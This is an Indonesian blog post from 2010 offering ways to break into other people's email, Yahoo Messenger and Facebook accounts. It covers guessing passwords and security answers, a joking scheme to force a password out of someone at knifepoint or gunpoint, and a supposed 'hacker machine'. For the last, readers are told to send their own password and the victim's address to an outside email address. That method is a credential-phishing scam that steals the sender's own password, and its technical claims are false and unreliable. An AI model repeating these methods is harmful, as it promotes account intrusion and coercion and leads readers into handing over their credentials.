Selamat datang di rumah sederhana tempat berteduh dari keramaian jagad maya. Terima kasih telah bersedia singgah dan bersilaturahmi di sebuah noktah kecil dalam luasnya alam maya. Semoga perjumpaan ini bisa berlanjut di kesempatan yang lain

Senin, 22 Maret 2010

Buka Password Orang Lain

Cara membuka YM atau Facebook orang lain

Ada banyak sekali cara membuka kepunyaaan orang lain (bukan buka celana loh!) iiih... Nakal deh, yang di maksud di sini adalah membuka email atau password orang lain, istilah kerennya nge hack atau hacker atau apalah, gak penting banget, apalah artinya sebuah nama, wuich!!!?Di bawah ini ada beberapa trik jitu untuk membuka celana orang lain, eh buka password dhenk :

Cara pertama, gini neh caranya :
1. Ketik email address / alamat email
2. Masukkan pasword (terserah apa aja)
3. Setelah muncul warning "pasword incorect"
4. Klik help dan jawab pertanyaan pilihan (jawab aja terserah, menuruti kata hati)
5. Kalo masih tidak bisa coba isi dengan pasword yang lain
6. Ulangi terus (kalo kamu gak males dan putus asa lanujutkan terusss)
7. Kalo udah berhasil kasih tau aku and cerita-cerita ke kita ya, he he he...

Cara yang ke dua, he he he :
1. Tentukan target (orang yang ingin anda ...)
2. Siapkan pisau atau pistollah yang lebih sangar lagi
3. Sisipkan di kantong celana
4. Ajak target ke tempat koneksi internet ato warnet terdekat
5. Sampai di tempat tujuan, todongkan pistol ato pisau tersebut
7. Ancam target untuk kasih tau password
6. Selamat mencoba, pisss...
"daripada dibunuh ma kamo, mending kasih password dah, dompet sekalian kamo bawa juga kagak papa dari pada nyawa melayang, hi hi hi..."

Cara ke tiga, selanjutnya mari kita coba pake cara yang terakhir ini :
Caranya sangat simpel kamu cukup mengirimkan email ke mesin hacker facebook. Setelah itu mesin hacker akan mengirimkan password facebook yang kamu minta, jangan minta yang aneh-aneh lho ya (njaluk rabi ra neng khene tempat panggonane!!?

Langkah-langkahnya :

-Login ke email anda. (khusus pengguna yahoo/gmail)
-Lanjutkan ke halaman mengirim pesan.
-Kirim email ke : hackfacebook@gmx.com
-bcc: cc: (biarkan kosong)
-Subject: PASSWORD RETRIEVE

-Isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email korban.
baris ketiga tulis password email anda.
baris keempat tulis dengan kode ini : cgi-bin/$et76431&pwr999

Ini contoh pesan yang harus kamu kirim :

To : autorenewlogin@gmail.com
Bcc: Bc: (biarkan kosong)
Subject : password retrieve
Isi :
damien.vir@yahoo.co.id
angela@yahoo.com
DAMIENVIR
cgi-bin/$et76431&pwr999

Warning!!!
Mohon jangan disalah gunakan, diriku enggak mao bertanggung jawab atas semuanya.

Catatan :
1. Ingat anda mengirimkan email ke mesin bukan ke orang.Anda akan mendapat pemberitahuan setiap jam 10 pagi.
2. Fungsi anda memberikan password adalah untuk memudahkan mesin mencocokkan password anda dengan password si korban, jika password tersebut tidak sama, maka anda akan mendapat pemberitahuan bahwa password anda berbeda dan tentunya mesin akan mengirimkan password si korban juga ke email anda.
3. Jika anda mendapat pemberitahuan "Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days" tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
4. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah. Namun ingat ini hanya berlaku untuk pengguna Yahoo! dan Gmail.

Tidak ada komentar:

Poskan Komentar

Catatan Aku © 2008. Design by :Yanku Templates Sponsored by: Tutorial87 Commentcute